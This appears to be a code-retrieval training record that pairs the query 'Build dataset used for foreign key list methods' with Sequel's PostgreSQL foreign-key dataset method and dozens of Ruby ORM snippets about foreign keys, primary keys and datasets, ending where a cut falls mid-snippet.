"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def dataset_key\n :id\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def foreign_key_fields\n keys = []\n database_field_names.each do |param|\n if self.send(param).is_a? ForeignKey\n keys << param\n end\n end\n keys\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def association_foreign_keys(assoc_record)\n association_foreign_keys_names.map { |name| assoc_record.public_send(name) }\n end",
"def foreign_key\n association.foreign_key \n end",
"def dataset\n database[table_name]\n end",
"def associations_foreigns\n _reflections.map do |_, reflection|\n cols = [reflection.foreign_key]\n cols << reflection.foreign_type if reflection.polymorphic?\n cols\n end.flatten\n end",
"def _select_pk_ds\n @_select_pk_ds ||= metadata_dataset.\n from(:pg_class, :pg_attribute, :pg_index, :pg_namespace).\n where{[\n [pg_class[:oid], pg_attribute[:attrelid]],\n [pg_class[:relnamespace], pg_namespace[:oid]],\n [pg_class[:oid], pg_index[:indrelid]],\n [pg_index[:indkey].sql_subscript(0), pg_attribute[:attnum]],\n [pg_index[:indisprimary], 't']\n ]}.\n select{pg_attribute[:attname].as(:pk)}\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def foreign_properties\n to_h.slice(*foreign_keys + foreign_objects)\n end",
"def excluded_foreign_key_names\r\n excluded_dimension_relations = prejoined_fields.keys.collect {|k| dimension_relationships[k]}\r\n excluded_dimension_relations.collect {|r| r.foreign_key}\r\n end",
"def association_dataset_for(object)\n condition = if can_have_associated_objects?(object)\n predicate_keys.zip(predicate_key_values(object))\n else\n false\n end\n\n associated_dataset.where(condition)\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def link_belongs_to(reflection)\n reflection.foreign_key.to_sym\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def foreign_key\n self.name + \"_id\"\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def essential_columns(model_class)\n model_class.reflect_on_all_associations.inject([@primary_key]) do |arr, assoc|\n if assoc.options[:dependent] && assoc.macro == :belongs_to\n arr << assoc.association_foreign_key\n end\n arr\n end\n end",
"def index\n @foreign_keys = ForeignKey.all\n end",
"def references(current_table)\r\n references = []\r\n tables = get_tables\r\n tables.each do |table|\r\n columns = get_column_names(table)\r\n columns.each do |column|\r\n if /[_id]$/.match(column)\r\n references << table if column.split('_id').join == current_table\r\n end\r\n end\r\n end\r\n references\r\n end",
"def scaffold_foreign_key(reflection)\n get_key_array_safe(reflection.child_key).name\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def fetch_reference_ids(table, row)\n attributes = {}\n table.reference_columns.each do |c|\n new_id = nil\n if row[c.name.to_s].is_a?(Array)\n new_id = []\n row[c.name.to_s].each do |old_id|\n new_id << no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, old_id)\n end\n else\n new_id = no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, row[c.name.to_s])\n end\n attributes.merge!(c.name => new_id) unless new_id.nil?\n end\n attributes\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def sub_querier_keys()\n ret = @columnNames\n ret << :user_id\n ret << :milestone_id\n return ret\n end",
"def keys\n @table.keys.inject(@parent ? @parent.keys : []) do |res, k1|\n @table[k1].keys.inject(res) do |_res, k2|\n ref = make_reference(k1, k2)\n _res.include?(ref) ? _res : res << ref\n end\n end\n end",
"def stores_foreign_key?; true; end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def eager_loaded_ids(docs, metadata)\n if metadata.stores_foreign_key?\n docs.flat_map{ |doc| doc.send(metadata.foreign_key) }\n else\n docs.map(&:id)\n end\n end",
"def referenced_tables(tables)\n result = {}\n tables.each do |table|\n result[table] = []\n self.select_all(\"select reftabname from syscat.references where tabname = '#{table.upcase}'\").each do |row|\n result[table] << row['reftabname'].downcase\n end\n end\n result\n end",
"def foreign_key\n @resource_options.fetch :foreign_key,\n :\"#{tools.string.singularize association_name}_id\"\n end",
"def fk_join_arr\n result = []\n groups.each_with_index do |group, idx|\n group_alias = \"#{group.parent_table}_#{idx}\"\n group_query = group_query_builder(group)\n result.push \"JOIN (\\n#{group_query}\\n\\t) AS #{group_alias}_fk\"\n result.push \"ON #{group_alias}_fk.#{FKEYS[group.parent_table]}=#{group.parent_table}.#{group.parent_table_pk}\"\n if idx > 0\n groups.each_with_index do |x_group, x_idx|\n #next if x_idx < idx\n x_group_alias = \"#{x_group.parent_table}_#{x_idx}\"\n result.push \"\\tAND #{x_group_alias}_fk.year = #{group_alias}_fk.year\"\n break\n end\n end\n end\n return result\n end",
"def foreign_key_choices\n choices = []\n foreign_keys.each do |foreign_key|\n choices << foreign_key.all_from_class\n end\n choices\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def relation_foreign_key(relation)\n relation_reflect(relation).foreign_key\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def belongs_to_relations(ar_instance)\n\t\t\tcolumns = ar_instance.class.column_names\n\t\t\tparents = columns.map{ |c| c if c =~ /_id/ }.reject{ |c| c.nil? }\n\t\t\tparents.map!{ |parents| parents.gsub('_id', '') }\n\t\tend",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
"def foreign_key(*attributes)\n self.foreign_keys += attributes\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def keys\n @keys ||= [column_for_order_by(relation), primary_key].compact.uniq\n end",
"def related_data\n @resource.related_identifiers.where(verified: true).where(hidden: false).map do |ri|\n { relation: ri.relation_type_friendly&.camelize(:lower), identifier: ri.related_identifier }\n end || []\n end",
"def table_name\n if qualified? && meta[:qualified].is_a?(Symbol)\n meta[:qualified]\n else\n source.dataset\n end\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def has_many_relations(ar_instance)\n\t\t\tcolumn_name = \"#{ar_instance.class.name.underscore}_id\"\n\t\t\tdescendents = ActiveRecord::Base.connection.tables\n\t\t\tdescendents.reject!{ |table| false unless table.classify.constantize rescue true }\n\t\t\tdescendents.reject!{ |table| true unless table.classify.constantize.column_names.include?(column_name) }\n\t\tend",
"def foreigns\n []\n end",
"def extract_dbc_data\n tabledata = {}\n\n curt = nil\n @db.each do |r|\n unless r.nil?\n if r.objecttype == \"Table\"\n # This is a related table\n tabledata[r.objectid] = {name: r.objectname, fields: []}\n elsif r.objecttype == \"Field\"\n # This is a related field. The parentid points to the table object\n\n # create using the parentid if the parentid is still unknown.\n tabledata[r.parentid] = {name: \"UNKNOWN\", fields: []} unless tabledata.has_key?(r.parentid)\n tabledata[r.parentid][:fields] << r.objectname\n end\n end\n end\n\n # now we need to transform the resulting array-hash to a direct mapping (changed to support older Ruby versions)\n # { tablename => [fieldnames] }\n @tables = {}\n tabledata.each{|k, v| @tables[v[:name]] = v[:fields] }\n end",
"def association_key\n table[association_key_name]\n end",
"def schema_ds_join(table_name, opts)\n [:information_schema__columns, {:table_catalog=>:table_catalog,\n :table_schema => :table_schema, :table_name => :table_name} , :c]\n end",
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def foreign_key_for(association)\n model_instance[association.foreign_key_column_name]\n end",
"def find_table_by_foreign_key(column_name)\n @opts[:foreign_key][:alias].values_at(column_name).first\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def association_attributes\n outgoing_reflections.values.map { |reflection| reflection.foreign_key.to_s }\n end",
"def scaf_foreign_key_name( assoc )\n assoc.primary_key_name\n end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def association_keys\n association\n .__send__(:join_key_map, container.relations)\n end",
"def table_ref(t)\n case t\n when Dataset\n t.to_table_reference\n when Hash\n t.map {|k, v| \"#{table_ref(k)} #{table_ref(v)}\"}.join(COMMA_SEPARATOR)\n when Symbol\n symbol_to_column_ref(t)\n when String\n quote_identifier(t)\n else\n literal(t)\n end\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def preload_belongs_to(connection, records, relation, as:)\n belonging_column = relation.belonging_column.to_sym\n having_column = relation.having_column.to_sym\n\n foreign_ids = H.pluck(records, belonging_column).uniq.compact\n\n scope = connection.scope(table: relation.having_table)\n scope = scope.where(having_column => foreign_ids)\n\n recs = connection.all(scope, into: Hash)\n recs_by_id = H.by_key(recs, having_column)\n\n records.each do |model|\n model[as] = recs_by_id[model.fetch(belonging_column)]\n end\n end",
"def build_id_constraint(reflection, keys, value, table = nil, bind_param = false)\n table ||= reflection.aliased_table\n value, binds = build_binds_for_constraint(reflection, value, keys.foreign_key) \\\n if bind_param\n\n [reflection.build_id_constraint(table[keys.key], value), binds]\n end",
"def dataset_id\n return @reference.dataset_id if reference?\n @gapi_json[:modelReference][:datasetId]\n end",
"def keys\n\t\t@name_table\n\tend",
"def foreign_key?\n @ref_table ? true : false\n end",
"def table\n association.table_name\n end",
"def combine_polymorphic_foreign_keys\n @index_columns.each do |_table, foreign_keys|\n foreign_id_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_id/ }\n foreign_type_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_type/ }\n foreign_id_keys.each do |id_key|\n next unless type_key =\n foreign_type_keys.detect { |type_key| type_key.first == id_key.first.sub(/_id/, '') + '_type' }\n\n foreign_keys.delete(id_key)\n foreign_keys.delete(type_key)\n foreign_keys << id_key + type_key\n end\n end\n end"
] |
[
"0.720176",
"0.68655574",
"0.6834935",
"0.6735687",
"0.6703324",
"0.6665703",
"0.651877",
"0.6441737",
"0.640113",
"0.640113",
"0.637693",
"0.63623524",
"0.6326083",
"0.6310065",
"0.6262004",
"0.6242311",
"0.61340344",
"0.6112476",
"0.60712636",
"0.60219014",
"0.60215473",
"0.599201",
"0.5970358",
"0.5956353",
"0.5926209",
"0.591749",
"0.5904487",
"0.5897674",
"0.58668226",
"0.5817491",
"0.5816471",
"0.5811237",
"0.58106625",
"0.5793118",
"0.577899",
"0.5777368",
"0.57617366",
"0.5758378",
"0.57553726",
"0.5742011",
"0.5736639",
"0.5732755",
"0.5726754",
"0.56980985",
"0.5660365",
"0.5660365",
"0.5614689",
"0.5605395",
"0.56048876",
"0.5596807",
"0.5587384",
"0.558672",
"0.55608004",
"0.554482",
"0.55411786",
"0.5538057",
"0.5532134",
"0.5513305",
"0.5493595",
"0.54873544",
"0.5482563",
"0.5480416",
"0.5472663",
"0.5472663",
"0.5469943",
"0.54662204",
"0.54609203",
"0.5460148",
"0.5439532",
"0.5435209",
"0.5423513",
"0.541812",
"0.54173946",
"0.54087603",
"0.5401885",
"0.54010266",
"0.54007673",
"0.53953546",
"0.5394593",
"0.5392467",
"0.5392299",
"0.5387156",
"0.53836817",
"0.53831345",
"0.5382937",
"0.5373587",
"0.5373587",
"0.53724176",
"0.537164",
"0.5369725",
"0.5369725",
"0.53518903",
"0.5350268",
"0.5350055",
"0.53492033",
"0.5345168",
"0.5344518",
"0.53441817",
"0.5339995",
"0.5334228"
] |
0.6119571
|
17
|
Build dataset used for foreign key list methods.
|
def __foreign_key_list_ds(reverse)
if reverse
ctable = Sequel[:att2]
cclass = Sequel[:cl2]
rtable = Sequel[:att]
rclass = Sequel[:cl]
else
ctable = Sequel[:att]
cclass = Sequel[:cl]
rtable = Sequel[:att2]
rclass = Sequel[:cl2]
end
if server_version >= 90500
cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}
rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}
# :nocov:
else
range = 0...32
cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}
rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}
# :nocov:
end
ds = metadata_dataset.
from{pg_constraint.as(:co)}.
join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).
join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).
join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).
join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).
join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).
order{[co[:conname], cpos]}.
where{{
cl[:relkind]=>%w'r p',
co[:contype]=>'f',
cpos=>rpos
}}.
select{[
co[:conname].as(:name),
ctable[:attname].as(:column),
co[:confupdtype].as(:on_update),
co[:confdeltype].as(:on_delete),
cl2[:relname].as(:table),
rtable[:attname].as(:refcolumn),
SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),
nsp[:nspname].as(:schema)
]}
if reverse
ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])
end
ds
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def _reverse_foreign_key_list_ds\n @_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)\n end",
"def build!(data_set_name)\n interface(data_set_name).create_empty_data_set\n library[data_set_name] = DataSet.new(data_set_name, interface(data_set_name))\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def dataset_key\n :id\n end",
"def _dataset(opts)\n raise(Sequel::Error, \"model object #{inspect} does not have a primary key\") if opts.dataset_need_primary_key? && !pk\n ds = if opts[:dataset].arity == 1\n instance_exec(opts, &opts[:dataset])\n else\n instance_exec(&opts[:dataset])\n end\n _apply_association_options(opts, ds)\n end",
"def initialize(dataset)\n opts = dataset.opts\n eager_graph = opts[:eager_graph]\n @master = eager_graph[:master]\n requirements = eager_graph[:requirements]\n reflection_map = @reflection_map = eager_graph[:reflections]\n reciprocal_map = @reciprocal_map = eager_graph[:reciprocals]\n limit_map = @limit_map = eager_graph[:limits]\n @unique = eager_graph[:cartesian_product_number] > 1\n \n alias_map = @alias_map = {}\n type_map = @type_map = {}\n after_load_map = @after_load_map = {}\n reflection_map.each do |k, v|\n alias_map[k] = v[:name]\n after_load_map[k] = v[:after_load] unless v[:after_load].empty?\n type_map[k] = if v.returns_array?\n true\n elsif (limit_and_offset = limit_map[k]) && !limit_and_offset.last.nil?\n :offset\n end\n end\n\n # Make dependency map hash out of requirements array for each association.\n # This builds a tree of dependencies that will be used for recursion\n # to ensure that all parts of the object graph are loaded into the\n # appropriate subordinate association.\n @dependency_map = {}\n # Sort the associations by requirements length, so that\n # requirements are added to the dependency hash before their\n # dependencies.\n requirements.sort_by{|a| a[1].length}.each do |ta, deps|\n if deps.empty?\n dependency_map[ta] = {}\n else\n deps = deps.dup\n hash = dependency_map[deps.shift]\n deps.each do |dep|\n hash = hash[dep]\n end\n hash[ta] = {}\n end\n end\n \n # This mapping is used to make sure that duplicate entries in the\n # result set are mapped to a single record. For example, using a\n # single one_to_many association with 10 associated records,\n # the main object column values appear in the object graph 10 times.\n # We map by primary key, if available, or by the object's entire values,\n # if not. The mapping must be per table, so create sub maps for each 